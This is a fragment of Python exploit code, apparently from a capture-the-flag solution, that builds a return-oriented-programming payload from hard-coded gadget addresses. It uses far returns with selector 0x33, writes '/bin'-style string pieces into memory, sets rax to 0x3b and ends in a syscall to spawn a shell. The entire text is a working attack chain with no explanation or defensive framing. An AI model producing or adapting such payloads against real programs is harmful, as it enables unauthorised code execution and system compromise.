payload = p64(0x4011ad)
#0x00000000004011ad: pop rbp; ret; 
payload += p64(0x465095)+p64(0x4159b0)
# 0x4159b0: pop rax ; retf 2
payload += p64(0x6e69622f)+p32(0x442192)+p32(0x33)+"\x00"*2
# 0x0000000000442192: xchg ebx, eax; ret; 
payload += p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4011ad)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x465099)+p64(0x4159b0)
# 0x4159b0: pop rax ; retf 2
payload += p64(0x68662f)+p32(0x442192)+p32(0x33)+"\x00"*2
# 0x0000000000442192: xchg ebx, eax; ret; 
payload += p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x424ca6)
# 0x424ca6: pop rsi ; retf 1
payload += p64(0x4651bf)+p32(0x44057f)+p32(0x33)+"\x00"*1
# 0x44057f: pop rdi ; add ah, byte ptr [rsi - 0x3f] ; retf
payload += p64(0x465058)+p32(0x424ca6)+p32(0x33)
# 0x424ca6: pop rsi ; retf 1
payload += p64(0x0)+p32(0x44bc5a)+p32(0x33)+"\x00"*1
# 0x000000000044bc5a: pop rdx; ret 0; 
payload += p64(0x0)+p64(0x4159b0)
# 0x4159b0: pop rax ; retf 2
payload += p64(0x3b)+p32(0x40b19c)+p32(0x33)+"\x00"*2
# 0x000000000040b19c: syscall; 
payload += b''
